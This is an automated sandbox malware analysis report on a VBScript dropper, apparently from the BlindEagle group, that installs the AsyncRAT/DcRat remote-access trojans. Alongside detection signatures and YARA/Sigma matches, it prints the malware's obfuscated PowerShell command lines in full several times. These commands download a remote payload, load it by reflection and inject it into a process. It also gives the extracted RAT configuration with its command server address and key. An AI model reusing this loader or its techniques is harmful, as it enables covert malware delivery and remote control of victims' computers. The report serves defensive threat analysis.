Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qiEmGNhUij.vbs

Overview

General Information

Sample name:qiEmGNhUij.vbs
renamed because original name is a hash value
Original sample name:41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7.vbs
Analysis ID:1523822
MD5:f182482644ecb63bbc8c1dac4fa0be31
SHA1:e946d969c0f37ae9b56d4851fd1f3dfa79f3c4a9
SHA256:41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

AsyncRAT, DcRat, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1876 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 1760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
{"Server": "148.113.165.11", "Ports": "3236", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "V4JA2wRo4wMqThNx0lUpEh05ezE9saTH", "Mutex": "Dggx_gg", "Certificate": "MIICJjCCAY+gAwIBAgIVAKTSE5n95JKjYKaeetJmkZ8WSed/MA0GCSqGSIb3DQEBDQUAMFoxCzAJBgNVBAMMAmdnMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMxMjAzMTAyNjE5WhcNMzQwOTExMTAyNjE5WjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAphKhL5VEa5bZce3HMNoHj07+Nyd8QMtT+YV1vVQeIuxBYfOBrszAxxSRJayhzQwZjw8Du9bw87agBJW06h+GHW8MOufcZ+vKSxmpOL0ze3nUSJiOsfboKa06jcmEpo32D7LTxng9/mAGKb0YGEFUGx88yMDaa+NiBIn/LnWXvaECAwEAAaMyMDAwHQYDVR0OBBYEFMn0HT3AJLPhSr+HTYNM/0589fJ0MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEASB+of3f3t+mAacV7FNg5vwlQhgObMv2su+9BL5KxsQVNsBhluNcrZINzF5jKq/8VafO48B00S1O2MnNHmBXQlZ09Iw8Krvm1hZDmBErHPe0Bwwa5ox6ZpJLnodcOGX2JXMfEY2n/6QC0zva9sGQiyazHOYJRTk5RgJhN7j10nZY=", "ServerSignature": "XjeYWme80rSVhHa/BEFI1k3bRgPGhkJfVbkFLvepbqtufl6cOLxu+woVZZM7psVFdchemmHXVOOta4B/iTyJBzInHTih/neulrIRbgq5zdS22cEhHESwIui1ZS3o5BnYGcZRdZTdXfGH6otoicbOBzdpc41nx3BIOXuL5tRHqjI=", "BDOS": "null", "External_config_on_Pastebin": "false"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x2d83f1:$b2: DcRat By qwqdanchun1
SourceRuleDescriptionAuthorStrings
00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
    • 0x63fb:$a1: havecamera
    • 0x9874:$a2: timeout 3 > NUL
    • 0x9894:$a3: START "" "
    • 0x971f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
    • 0x97d4:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
    00000005.00000002.2712121235.0000000005398000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
    • 0xd39a:$b2: DcRat By qwqdanchun1
    00000004.00000002.1528856037.000001DFCD980000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000005.00000002.2712121235.00000000052C0000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0x13eae:$b2: DcRat By qwqdanchun1
      Click to see the 12 entries
      SourceRuleDescriptionAuthorStrings
      5.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        5.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_DCRat_1aeea1acunknownunknown
        • 0x65fb:$a1: havecamera
        • 0x9a74:$a2: timeout 3 > NUL
        • 0x9a94:$a3: START "" "
        • 0x991f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
        • 0x99d4:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
        5.2.AddInProcess32.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_B64_ArtifactsDetects executables embedding bas64-encoded APIs, command lines, registry keys, etc.ditekSHen
        • 0x99d4:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
        • 0x991f:$s2: L2Mgc2NodGFza3MgL2
        • 0x989e:$s3: QW1zaVNjYW5CdWZmZXI
        • 0x98ec:$s4: VmlydHVhbFByb3RlY3Q
        5.2.AddInProcess32.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
        • 0x9c56:$q1: Select * from Win32_CacheMemory
        • 0x9c96:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
        • 0x9ce4:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
        • 0x9d32:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
        5.2.AddInProcess32.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DcRatByDetects executables containing the string DcRatByditekSHen
        • 0xa0ce:$s1: DcRatBy
        Click to see the 15 entries

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProc
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQ
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProc
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs", ProcessId: 1876, ProcessName: wscript.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 